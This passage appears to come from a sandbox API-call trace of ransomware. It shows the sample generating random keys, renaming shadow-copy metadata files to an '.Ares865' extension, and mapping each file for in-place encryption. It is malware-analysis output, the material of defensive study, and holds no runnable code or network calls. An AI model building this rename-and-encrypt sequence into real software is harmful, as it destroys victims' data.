phProv=0x2ccce04*=0x2f0518) returned 1 [0113.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.261] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.Ares865") returned 118 [0113.261] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.262] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3632) returned 1 [0113.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.263] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1130, lpName=0x0) returned 0x170 [0113.265] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1130) returned 0x190000 [0113.266] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.266] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.266] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.267] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.Ares865") returned 118 [0113.267] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.268] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3184) returned 1 [0113.269] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.269] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.269] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.270] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf70, lpName=0x0) returned 0x170 [0113.271] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf70) returned 0x190000 [0113.272] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.273] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.273] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.273] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.Ares865") returned 118 [0113.273] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.274] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2944) returned 1 [0113.275] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.275] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.275] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.276] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe80, lpName=0x0) returned 0x170 [0113.280] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe80) returned 0x190000 [0113.280] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.281] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.281] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.Ares865") returned 118 [0113.283] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.284] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.285] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=840) returned 1 [0113.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.286] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x170 [0113.287] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x190000 [0113.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.289] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.Ares865") returned 118 [0113.289] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.290] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.290] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2616) returned 1 [0113.291] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.291] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd40, lpName=0x0) returned 0x170 [0113.293] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0x190000 [0113.294] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.Ares865") returned 118 [0113.295] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.296] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3440) returned 1 [0113.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.297] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.297] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.297] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1070, lpName=0x0) returned 0x170 [0113.299] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1070) returned 0x190000 [0113.300] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.301] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.301] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.301] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.Ares865") returned 118 [0113.301] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.302] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{7a521dbe-9658-44e5-843c-29dd5c50d136}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.302] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3416) returned 1 [0113.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.303] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1060, lpName=0x0) returned 0x170 [0113.305] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1060) returned 0x190000 [0113.306] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.306] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.306] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.Ares865") returned 118 [0113.307] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.308] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8000ffcd-1da9-461e-a8a6-b9c248869570}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.309] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2784) returned 1 [0113.309] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.309] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.309] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.310] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xde0, lpName=0x0) returned 0x170 [0113.312] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xde0) returned 0x190000 [0113.313] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.Ares865") returned 118 [0113.314] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8002c55b-b05c-402e-b80d-41cead61f984}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8002c55b-b05c-402e-b80d-41cead61f984}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.315] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{8002c55b-b05c-402e-b80d-41cead61f984}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3360) returned 1 [0113.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.316] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1020, lpName=0x0) returned 0x170 [0113.318] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1020) returned 0x190000 [0113.321] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.322] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.322] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.Ares865") returned 118 [0113.322] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{9069688d-befb-4294-b8a6-15447e1f812d}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{9069688d-befb-4294-b8a6-15447e1f812d}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.323] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{9069688d-befb-4294-b8a6-15447e1f812d}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=944) returned 1 [0113.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.325] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x170 [0113.326] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x190000 [0113.327] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.328] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.328] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.329] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.Ares865") returned 118 [0113.329] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.330] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume 